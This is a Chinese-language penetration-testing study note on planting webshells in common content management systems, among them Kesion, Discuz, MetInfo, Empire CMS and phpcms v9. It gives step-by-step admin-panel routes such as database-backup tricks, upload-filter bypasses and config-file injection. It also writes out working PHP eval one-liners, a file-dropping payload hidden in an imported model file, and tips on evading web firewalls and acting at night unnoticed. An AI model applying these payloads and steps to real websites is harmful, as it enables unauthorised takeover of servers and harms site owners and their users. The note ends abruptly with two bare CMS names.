渗透测试学习 二十三、常见cms拿shell

时间:2024-10-05 15:04:38

常见cms

良精、科讯、动易、aspcms、dz

米拓cms、phpcms2008、帝国cms、phpv9

phpweb、dedecms

良精

方法:

1、数据库备份拿shell

上传图片——点击数据库备份——改为脚本格式——添加账号,讲一句话添加在用户名处——备份——改为脚本格式

2、双文件上传

3、配置插马

4、修改文件上传类型直接上传

科讯(用IE)

/admin/admin.asp   后台路径

1、利用解析漏洞

2、设置——网站基本信息设置——默认允许上传文件类型,将asp改为aaspsp(会将asp替换为空)

内容——图片添加——上传时改为aaspsp

设置——基本设置——其它选项——通用页面目录——html/a.asp/(目录解析)——标签——自定义静态标签——增加静态标签——插入一句话——自定义页面——生成一个页面,会在a.asp目录下

动易(学校,简单的企业)

在网站配置中插马——连接inc/config.asp文件

数据库备份

双文件上传

aspcms

界面风格——编辑模板/css文件(利用IIS6.0解析漏洞)——添加——文件系统——a.asp;html——内容插入一句话

拓展功能——幻灯片设置——插马

dz

uckey或利用插件上传(常见的网站discuz x2.5)

后台 admin.php或cu_server

站长——ucenter设置(通过配置插马,闭合拿shell)

站长——数据库备份(或短文件漏洞)

米拓cms

metinfo 5.3.18                   install/phpinfo.php——里面能找到网站根目录

后台         admin/index.php (上传图片马 包含文件)

后台——安全——数据库备份——下载——打开(txt)——在完整的一句话后面写入新的一句话(select “<?php @eval($_POST[A]);?>” into outfile ‘网站根目录,路径写成Linux路径’)——恢复(一般在晚上没有数据交互的时候再做)

权限要求很高

帝国cms

empircms-v6.6

127.0.0.1/e/install

后台:127.0.0.1/e/admin/index.php

后台——数据表与系统模型——管理数据表——管理系统表模型——导入系统模型(要导.mod的文件)——<?fputs(fopen(“cnm.php”,”w”),”<?eval(\$_POST[cmd];)?>”)?>保存为mod文件,文件名为aa.php.mod——记住导入的目录路径/e/admin/cnm.php

注意:导入时候可能会有waf,可以在脚本中加入免杀的一句话

phpv9

phpcms_v9.6.3_GBK

127.0.0.1/install

后台——界面——模板风格——详情列表——search——编辑插马

后台——phpsso——系统管理——ucenter配置——uc_config.php中 ‘);eval($_post[a]);#

后台——内容——专题         phpv9低权限拿shell

phpweb

dedecmd